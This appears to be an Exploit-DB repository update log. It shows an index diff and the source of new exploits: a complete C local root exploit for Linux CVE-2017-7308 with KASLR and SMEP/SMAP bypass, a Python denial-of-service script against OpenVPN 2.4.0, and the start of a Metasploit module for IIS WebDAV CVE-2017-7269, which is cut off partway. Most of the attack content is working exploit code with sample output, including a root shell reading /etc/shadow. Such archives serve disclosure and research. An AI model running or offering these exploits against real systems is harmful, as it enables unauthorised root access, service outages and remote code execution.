DB: 2017-05-12

5 new exploits

OpenVPN 2.4.0 - Unauthenticated Denial of Service

Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Privilege Escalation (3)

Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation

Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010)
Microsoft Windows - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)

Microsoft IIS WebDav - ScStoragePathFromUrl Overflow (Metasploit)

files.csv

@@ -5490,6 +5490,7 @@ id,file,description,date,author,platform,type,port
 41983,platforms/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflows",2017-05-09,"Google Security Research",android,dos,0
 41984,platforms/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,multiple,dos,0
 41991,platforms/linux/dos/41991.py,"SAP SAPCAR 721.510 - Heap-Based Buffer Overflow",2017-05-10,"Core Security",linux,dos,0
+41993,platforms/multiple/dos/41993.py,"OpenVPN 2.4.0 - Unauthenticated Denial of Service",2017-05-11,QuarksLab,multiple,dos,1194
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8295,7 +8296,7 @@ id,file,description,date,author,platform,type,port
 31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,linux,local,0
 31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
 31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)",2014-02-02,saelo,linux,local,0
-31347,platforms/lin_x86/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86,local,0
+31347,platforms/lin_x86-64/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86-64,local,0
 31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
 31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0
 31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
@@ -8978,6 +8979,7 @@ id,file,description,date,author,platform,type,port
 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
+41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15467,7 +15469,7 @@ id,file,description,date,author,platform,type,port
 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
-41987,platforms/windows/remote/41987.c,"Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
+41987,platforms/windows/remote/41987.py,"Microsoft Windows - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
 41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
 41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0
@@ -15496,6 +15498,7 @@ id,file,description,date,author,platform,type,port
 41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0
 41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0
 41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80
+41992,platforms/windows/remote/41992.rb,"Microsoft IIS WebDav - ScStoragePathFromUrl Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0

platforms/linux/local/41994.c

@@ -0,0 +1,497 @@
+// A proof-of-concept local root exploit for CVE-2017-7308.
+// Includes a SMEP & SMAP bypass.
+// Tested on 4.8.0-41-generic Ubuntu kernel.
+// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308
+//
+// Usage:
+// user@ubuntu:~$ uname -a
+// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...
+// user@ubuntu:~$ gcc pwn.c -o pwn
+// user@ubuntu:~$ ./pwn 
+// [.] starting
+// [.] namespace sandbox set up
+// [.] KASLR bypass enabled, getting kernel addr
+// [.] done, kernel text:   ffffffff87000000
+// [.] commit_creds:        ffffffff870a5cf0
+// [.] prepare_kernel_cred: ffffffff870a60e0
+// [.] native_write_cr4:    ffffffff87064210
+// [.] padding heap
+// [.] done, heap is padded
+// [.] SMEP & SMAP bypass enabled, turning them off
+// [.] done, SMEP & SMAP should be off now
+// [.] executing get root payload 0x401516
+// [.] done, should be root now
+// [.] checking if we got root
+// [+] got r00t ^_^
+// root@ubuntu:/home/user# cat /etc/shadow
+// root:!:17246:0:99999:7:::
+// daemon:*:17212:0:99999:7:::
+// bin:*:17212:0:99999:7:::
+// ...
+//
+// Andrey Konovalov <andreyknvl@gmail.com>
+
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <fcntl.h>
+#include <stdarg.h>
+#include <stdbool.h>
+#include <stddef.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sched.h>
+
+#include <sys/ioctl.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#include <arpa/inet.h>
+#include <linux/if_packet.h>
+#include <linux/ip.h>
+#include <linux/udp.h>
+#include <netinet/if_ether.h>
+#include <net/if.h>
+
+#define ENABLE_KASLR_BYPASS	1
+#define ENABLE_SMEP_SMAP_BYPASS	1
+
+// Will be overwritten if ENABLE_KASLR_BYPASS
+unsigned long KERNEL_BASE = 	0xffffffff81000000ul;
+
+// Kernel symbol offsets
+#define COMMIT_CREDS		0xa5cf0ul
+#define PREPARE_KERNEL_CRED	0xa60e0ul
+#define NATIVE_WRITE_CR4	0x64210ul
+
+// Should have SMEP and SMAP bits disabled
+#define CR4_DESIRED_VALUE	0x407f0ul
+
+#define KMALLOC_PAD		512
+#define PAGEALLOC_PAD		1024
+
+// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
+
+typedef uint32_t u32;
+
+// $ pahole -C hlist_node ./vmlinux
+struct hlist_node {
+	struct hlist_node *        next;                 /*     0     8 */
+	struct hlist_node * *      pprev;                /*     8     8 */
+};
+
+// $ pahole -C timer_list ./vmlinux
+struct timer_list {
+	struct hlist_node          entry;                /*     0    16 */
+	long unsigned int          expires;              /*    16     8 */
+	void                       (*function)(long unsigned int); /*    24     8 */
+	long unsigned int          data;                 /*    32     8 */
+	u32                        flags;                /*    40     4 */
+	int                        start_pid;            /*    44     4 */
+	void *                     start_site;           /*    48     8 */
+	char                       start_comm[16];       /*    56    16 */
+};
+
+// packet_sock->rx_ring->prb_bdqc->retire_blk_timer
+#define TIMER_OFFSET	896
+
+// pakcet_sock->xmit
+#define XMIT_OFFSET	1304
+
+// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
+
+void packet_socket_rx_ring_init(int s, unsigned int block_size,
+		unsigned int frame_size, unsigned int block_nr,
+		unsigned int sizeof_priv, unsigned int timeout) {
+	int v = TPACKET_V3;
+	int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
+	if (rv < 0) {
+		perror("[-] setsockopt(PACKET_VERSION)");
+		exit(EXIT_FAILURE);
+	}
+
+	struct tpacket_req3 req;
+	memset(&req, 0, sizeof(req));
+	req.tp_block_size = block_size;
+	req.tp_frame_size = frame_size;
+	req.tp_block_nr = block_nr;
+	req.tp_frame_nr = (block_size * block_nr) / frame_size;
+	req.tp_retire_blk_tov = timeout;
+	req.tp_sizeof_priv = sizeof_priv;
+	req.tp_feature_req_word = 0;
+
+	rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
+	if (rv < 0) {
+		perror("[-] setsockopt(PACKET_RX_RING)");
+		exit(EXIT_FAILURE);
+	}
+}
+
+int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
+		unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
+	int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
+	if (s < 0) {
+		perror("[-] socket(AF_PACKET)");
+		exit(EXIT_FAILURE);
+	}
+
+	packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
+		sizeof_priv, timeout);
+
+	struct sockaddr_ll sa;
+	memset(&sa, 0, sizeof(sa));
+	sa.sll_family = PF_PACKET;
+	sa.sll_protocol = htons(ETH_P_ALL);
+	sa.sll_ifindex = if_nametoindex("lo");
+	sa.sll_hatype = 0;
+	sa.sll_pkttype = 0;
+	sa.sll_halen = 0;
+
+	int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
+	if (rv < 0) {
+		perror("[-] bind(AF_PACKET)");
+		exit(EXIT_FAILURE);
+	}
+
+	return s;
+}
+
+void packet_socket_send(int s, char *buffer, int size) {
+	struct sockaddr_ll sa;
+	memset(&sa, 0, sizeof(sa));
+	sa.sll_ifindex = if_nametoindex("lo");
+	sa.sll_halen = ETH_ALEN;
+
+	if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,
+			sizeof(sa)) < 0) {
+		perror("[-] sendto(SOCK_RAW)");
+		exit(EXIT_FAILURE);
+	}
+}
+
+void loopback_send(char *buffer, int size) {
+	int s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
+	if (s == -1) {
+		perror("[-] socket(SOCK_RAW)");
+		exit(EXIT_FAILURE);
+	}
+
+	packet_socket_send(s, buffer, size);
+}
+
+int packet_sock_kmalloc() {
+	int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
+	if (s == -1) {
+		perror("[-] socket(SOCK_DGRAM)");
+		exit(EXIT_FAILURE);
+	}
+	return s;
+}
+
+void packet_sock_timer_schedule(int s, int timeout) {
+	packet_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);
+}
+
+void packet_sock_id_match_trigger(int s) {
+	char buffer[16];
+	packet_socket_send(s, &buffer[0], sizeof(buffer));
+}
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+
+#define ALIGN(x, a)			__ALIGN_KERNEL((x), (a))
+#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)
+#define __ALIGN_KERNEL_MASK(x, mask)	(((x) + (mask)) & ~(mask))
+
+#define V3_ALIGNMENT	(8)
+#define BLK_HDR_LEN	(ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT))
+
+#define ETH_HDR_LEN	sizeof(struct ethhdr)
+#define IP_HDR_LEN	sizeof(struct iphdr)
+#define UDP_HDR_LEN	sizeof(struct udphdr)
+
+#define UDP_HDR_LEN_FULL	(ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN)
+
+int oob_setup(int offset) {
+	unsigned int maclen = ETH_HDR_LEN;
+	unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +
+				(maclen < 16 ? 16 : maclen));
+	unsigned int macoff = netoff - maclen;
+	unsigned int sizeof_priv = (1u<<31) + (1u<<30) +
+		0x8000 - BLK_HDR_LEN - macoff + offset;
+	return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);
+}
+
+void oob_write(char *buffer, int size) {
+	loopback_send(buffer, size);
+}
+
+void oob_timer_execute(void *func, unsigned long arg) {
+	oob_setup(2048 + TIMER_OFFSET - 8);
+
+	int i;
+	for (i = 0; i < 32; i++) {
+		int timer = packet_sock_kmalloc();
+		packet_sock_timer_schedule(timer, 1000);
+	}
+
+	char buffer[2048];
+	memset(&buffer[0], 0, sizeof(buffer));
+
+	struct timer_list *timer = (struct timer_list *)&buffer[8];
+	timer->function = func;
+	timer->data = arg;
+	timer->flags = 1;
+
+	oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);
+
+	sleep(1);
+}
+
+void oob_id_match_execute(void *func) {
+	int s = oob_setup(2048 + XMIT_OFFSET - 64);
+
+	int ps[32];
+
+	int i;
+	for (i = 0; i < 32; i++)
+		ps[i] = packet_sock_kmalloc();
+
+	char buffer[2048];
+	memset(&buffer[0], 0, 2048);
+
+	void **xmit = (void **)&buffer[64];
+	*xmit = func;
+
+	oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);
+
+	for (i = 0; i < 32; i++)
+		packet_sock_id_match_trigger(ps[i]);
+}
+
+// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
+
+void kmalloc_pad(int count) {
+	int i;
+	for (i = 0; i < count; i++)
+		packet_sock_kmalloc();
+}
+
+void pagealloc_pad(int count) {
+	packet_socket_setup(0x8000, 2048, count, 0, 100);
+}
+
+// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
+
+typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+
+void get_root_payload(void) {
+	((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(
+		((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)
+	);
+}
+
+// * * * * * * * * * * * * * Simple KASLR bypass * * * * * * * * * * * * * * *
+
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+unsigned long get_kernel_addr() {
+	int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+	if (size == -1) {
+		perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)");
+		exit(EXIT_FAILURE);
+	}
+
+	size = (size / getpagesize() + 1) * getpagesize();
+	char *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,
+		MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+	size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);
+	if (size == -1) {
+		perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)");
+		exit(EXIT_FAILURE);
+	}
+
+	const char *needle1 = "Freeing SMP";
+	char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));
+	if (substr == NULL) {
+		fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle1);
+		exit(EXIT_FAILURE);
+	}
+
+	for (size = 0; substr[size] != '\n'; size++);
+
+	const char *needle2 = "ffff";
+	substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));
+	if (substr == NULL) {
+		fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle2);
+		exit(EXIT_FAILURE);
+	}
+
+	char *endptr = &substr[16];
+	unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+	r &= 0xfffffffffff00000ul;
+	r -= 0x1000000ul;
+
+	return r;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+void exec_shell() {
+	char *shell = "/bin/bash";
+	char *args[] = {shell, "-i", NULL};
+	execve(shell, args, NULL);
+}
+
+void fork_shell() {
+	pid_t rv;
+
+	rv = fork();
+	if (rv == -1) {
+		perror("[-] fork()");
+		exit(EXIT_FAILURE);
+	}
+
+	if (rv == 0) {
+		exec_shell();
+	}
+}
+
+bool is_root() {
+	// We can't simple check uid, since we're running inside a namespace
+	// with uid set to 0. Try opening /etc/shadow instead.
+	int fd = open("/etc/shadow", O_RDONLY);
+	if (fd == -1)
+		return false;
+	close(fd);
+	return true;
+}
+
+void check_root() {
+	printf("[.] checking if we got root\n");
+
+	if (!is_root()) {
+		printf("[-] something went wrong =(\n");
+		return;
+	}
+
+	printf("[+] got r00t ^_^\n");
+
+	// Fork and exec instead of just doing the exec to avoid potential
+	// memory corruptions when closing packet sockets.
+	fork_shell();
+}
+
+bool write_file(const char* file, const char* what, ...) {
+	char buf[1024];
+	va_list args;
+	va_start(args, what);
+	vsnprintf(buf, sizeof(buf), what, args);
+	va_end(args);
+	buf[sizeof(buf) - 1] = 0;
+	int len = strlen(buf);
+
+	int fd = open(file, O_WRONLY | O_CLOEXEC);
+	if (fd == -1)
+		return false;
+	if (write(fd, buf, len) != len) {
+		close(fd);
+		return false;
+	}
+	close(fd);
+	return true;
+}
+
+void setup_sandbox() {
+	int real_uid = getuid();
+	int real_gid = getgid();
+
+        if (unshare(CLONE_NEWUSER) != 0) {
+		perror("[-] unshare(CLONE_NEWUSER)");
+		exit(EXIT_FAILURE);
+	}
+
+        if (unshare(CLONE_NEWNET) != 0) {
+		perror("[-] unshare(CLONE_NEWUSER)");
+		exit(EXIT_FAILURE);
+	}
+
+	if (!write_file("/proc/self/setgroups", "deny")) {
+		perror("[-] write_file(/proc/self/set_groups)");
+		exit(EXIT_FAILURE);
+	}
+	if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
+		perror("[-] write_file(/proc/self/uid_map)");
+		exit(EXIT_FAILURE);
+	}
+	if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
+		perror("[-] write_file(/proc/self/gid_map)");
+		exit(EXIT_FAILURE);
+	}
+
+	cpu_set_t my_set;
+	CPU_ZERO(&my_set);
+	CPU_SET(0, &my_set);
+	if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
+		perror("[-] sched_setaffinity()");
+		exit(EXIT_FAILURE);
+	}
+
+	if (system("/sbin/ifconfig lo up") != 0) {
+		perror("[-] system(/sbin/ifconfig lo up)");
+		exit(EXIT_FAILURE);
+	}
+}
+
+int main() {
+	printf("[.] starting\n");
+
+	setup_sandbox();
+
+	printf("[.] namespace sandbox set up\n");
+
+#if ENABLE_KASLR_BYPASS
+	printf("[.] KASLR bypass enabled, getting kernel addr\n");
+	KERNEL_BASE = get_kernel_addr();
+	printf("[.] done, kernel text:   %lx\n", KERNEL_BASE);
+#endif
+
+	printf("[.] commit_creds:        %lx\n", KERNEL_BASE + COMMIT_CREDS);
+	printf("[.] prepare_kernel_cred: %lx\n", KERNEL_BASE + PREPARE_KERNEL_CRED);
+
+#if ENABLE_SMEP_SMAP_BYPASS
+	printf("[.] native_write_cr4:    %lx\n", KERNEL_BASE + NATIVE_WRITE_CR4);
+#endif
+
+	printf("[.] padding heap\n");
+	kmalloc_pad(KMALLOC_PAD);
+	pagealloc_pad(PAGEALLOC_PAD);
+	printf("[.] done, heap is padded\n");
+
+#if ENABLE_SMEP_SMAP_BYPASS
+	printf("[.] SMEP & SMAP bypass enabled, turning them off\n");
+	oob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);
+	printf("[.] done, SMEP & SMAP should be off now\n");
+#endif
+
+	printf("[.] executing get root payload %p\n", &get_root_payload);
+	oob_id_match_execute((void *)&get_root_payload);
+	printf("[.] done, should be root now\n");
+
+	check_root();
+
+	while (1) sleep(1000);
+
+	return 0;
+}

platforms/multiple/dos/41993.py

@@ -0,0 +1,100 @@
+#!/usr/bin/env python3
+'''
+$ ./dos_server.py &
+$ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf
+...
+Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from [AF_INET]192.168.149.1:64249, sid=9a6c48a6 1467f5e1
+Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at ssl.c:3711 (buf_copy(in, buf))
+Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Exiting due to fatal error
+Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/route del -net 10.8.0.0 netmask 255.255.255.0
+Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Closing TUN/TAP interface Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/ifconfig tun0 0.0.0.0
+'''
+
+import binascii
+import os
+import socket
+from construct import *
+HOST, PORT = "192.168.0.1", 1194
+
+SessionID = Bytes(8)
+
+PControlV1 = Struct(
+    "packet_id" / Int32ub,
+    "data" / GreedyBytes
+)
+
+PAckV1 = Struct(
+    "remote_session_id" / SessionID
+)
+
+PControlHardResetClientV2 = Struct(
+    "packet_id" / Int32ub
+)
+
+PControlHardResetServerV2 = Struct(
+    "remote_session_id" / SessionID,
+    "packet_id" / Int32ub
+)
+
+OpenVPNPacket = Struct(
+    EmbeddedBitStruct(
+        "opcode" / Enum(BitsInteger(5),
+                        P_CONTROL_HARD_RESET_CLIENT_V1=1,
+                        P_CONTROL_HARD_RESET_SERVER_V1=2,
+                        P_CONTROL_HARD_RESET_CLIENT_V2=7,
+                        P_CONTROL_HARD_RESET_SERVER_V2=8,
+                        P_CONTROL_SOFT_RESET_V1=3,
+                        P_CONTROL_V1=4,
+                        P_ACK_V1=5,
+                        P_DATA_V1=6),
+        "key_id" / BitsInteger(3)
+    ),
+    "session_id" / SessionID,
+    "ack_packets" / PrefixedArray(Int8ub, Int32ub),
+    Embedded(Switch(this.opcode,
+            {
+                "P_CONTROL_V1": PControlV1,
+                "P_ACK_V1": PAckV1,
+                "P_CONTROL_HARD_RESET_CLIENT_V2": PControlHardResetClientV2,
+                "P_CONTROL_HARD_RESET_SERVER_V2": PControlHardResetServerV2
+            }))
+)
+def main():
+    session_id = os.urandom(8)
+
+    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    reset_client = OpenVPNPacket.build({
+        "opcode": "P_CONTROL_HARD_RESET_CLIENT_V2",
+        "key_id": 0,
+        "session_id": session_id,
+        "ack_packets": [],
+        "packet_id": 0})
+
+    sock.sendto(reset_client, (HOST, PORT))
+
+    data, addr = sock.recvfrom(8192)
+    reset_server = OpenVPNPacket.parse(data)
+
+    remote_session_id = reset_server.session_id
+
+    # ack server packet
+    ack_packet = OpenVPNPacket.build({
+        "opcode": "P_ACK_V1",
+        "key_id": 0,
+        "session_id": session_id,
+        "ack_packets": [reset_server.packet_id],
+        "remote_session_id": remote_session_id
+    })
+    sock.sendto(ack_packet, (HOST, PORT))
+
+    control_packet = OpenVPNPacket.build({
+        "opcode": "P_CONTROL_V1",
+        "key_id": 0,
+        "session_id": session_id,
+        "ack_packets": [],
+        "packet_id": 1,
+        "data": b"a" * 2048})
+    sock.sendto(control_packet, (HOST, PORT))
+
+if __name__ == '__main__':
+    main()

platforms/windows/remote/41992.rb

@@ -0,0 +1,178 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => ' Microsoft IIS WebDav ScStoragePathFromUrl Overflow',
+      'Description'    => %q{
+          Buffer overflow in the ScStoragePathFromUrl function
+          in the WebDAV service in Internet Information Services (IIS) 6.0
+          in Microsoft Windows Server 2003 R2 allows remote attackers to
+          execute arbitrary code via a long header beginning with
+          "If: <http://" in a PROPFIND request, as exploited in the
+          wild in July or August 2016.
+
+          Original exploit by Zhiniang Peng and Chen Wu.
+      },
+      'Author'         =>
+        [
+        'Zhiniang Peng', # Original author
+        'Chen Wu',       # Original author
+        'Dominic Chell <dominic@mdsec.co.uk>', # metasploit module
+        'firefart', # metasploit module
+        'zcgonvh <zcgonvh@qq.com>', # metasploit module
+        'Rich Whitcroft' # metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2017-7269' ],
+          [ 'BID', '97127' ],
+          [ 'URL', 'https://github.com/edwardz246003/IIS_exploit' ],
+          [ 'URL', 'https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html' ]
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'         => 2000,
+          'BadChars'      => "\x00",
+          'EncoderType'   => Msf::Encoder::Type::AlphanumUnicodeMixed,
+          'DisableNops'   =>  'True',
+          'EncoderOptions' =>
+            {
+              'BufferRegister' => 'ESI',
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+          'PrependMigrate' => true,
+        },
+      'Targets'        =>
+        [
+          [
+            'Microsoft Windows Server 2003 R2 SP2',
+            {
+              'Platform' => 'win',
+            },
+          ],
+        ],
+      'Platform'       => 'win',
+      'DisclosureDate' => 'Mar 26 2017',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Path of IIS 6 web application', '/']),
+        OptInt.new('MINPATHLENGTH', [ true, 'Start of physical path brute force', 3 ]),
+        OptInt.new('MAXPATHLENGTH', [ true, 'End of physical path brute force', 60 ]),
+      ])
+  end
+
+  def min_path_len
+    datastore['MINPATHLENGTH']
+  end
+
+  def max_path_len
+    datastore['MAXPATHLENGTH']
+  end
+
+  def supports_webdav?(headers)
+    if headers['MS-Author-Via'] == 'DAV' ||
+       headers['DASL'] == '<DAV:sql>' ||
+       headers['DAV'] =~ /^[1-9]+(,\s+[1-9]+)?$/ ||
+       headers['Public'] =~ /PROPFIND/ ||
+       headers['Allow'] =~ /PROPFIND/
+      return true
+    else
+      return false
+    end
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => target_uri.path,
+      'method' => 'OPTIONS'
+    })
+    if res && res.headers['Server'].include?('IIS/6.0') && supports_webdav?(res.headers)
+      return Exploit::CheckCode::Vulnerable
+    elsif res && supports_webdav?(res.headers)
+      return Exploit::CheckCode::Detected
+    elsif res.nil?
+      return Exploit::CheckCode::Unknown
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    # extract the local servername and port from a PROPFIND request
+    # these need to be the values from the backend server
+    # if testing a reverse proxy setup, these values differ
+    # from RHOST and RPORT but can be extracted this way
+    vprint_status("Extracting ServerName and Port")
+    res = send_request_raw(
+      'method' => 'PROPFIND',
+      'headers' => {
+        'Content-Length' => 0
+      },
+      'uri' => target_uri.path
+    )
+    fail_with(Failure::BadConfig, "Server did not respond correctly to WebDAV request") if(res.nil? || res.code != 207)
+
+    xml = res.get_xml_document
+    url = URI.parse(xml.at("//a:response//a:href").text)
+    server_name = url.hostname
+    server_port = url.port
+    server_scheme = url.scheme
+
+    http_host = "#{server_scheme}://#{server_name}:#{server_port}"
+    vprint_status("Using http_host #{http_host}")
+
+    min_path_len.upto(max_path_len) do |path_len|
+      vprint_status("Trying path length of #{path_len}...")
+
+      begin
+        buf1 = "<#{http_host}/"
+        buf1 << rand_text_alpha(114 - path_len)
